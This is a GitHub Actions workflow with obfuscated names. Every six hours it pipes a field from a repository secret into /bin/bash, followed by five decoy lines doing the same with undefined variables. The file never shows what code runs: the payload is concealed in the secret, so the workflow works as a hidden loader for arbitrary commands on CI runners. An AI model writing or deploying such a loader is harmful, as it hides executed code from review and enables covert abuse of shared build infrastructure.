name: luorenzong1098

on:
  workflow_dispatch:
  schedule:
    - cron: '29 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luorenzong1098
        env:
          wbd96217: ${{ secrets.wbd96217 }}
        run: |
          echo $wbd96217 | jq -r .zic9856 | /bin/bash
          echo $kyrd48 | jq -r .a142 | /bin/bash
          echo $qx54187 | jq -r .sh8622 | /bin/bash
          echo $ok779 | jq -r .kl5192 | /bin/bash
          echo $ovadn72466 | jq -r .fu7054 | /bin/bash
          echo $wo45 | jq -r .vtm2766 | /bin/bash

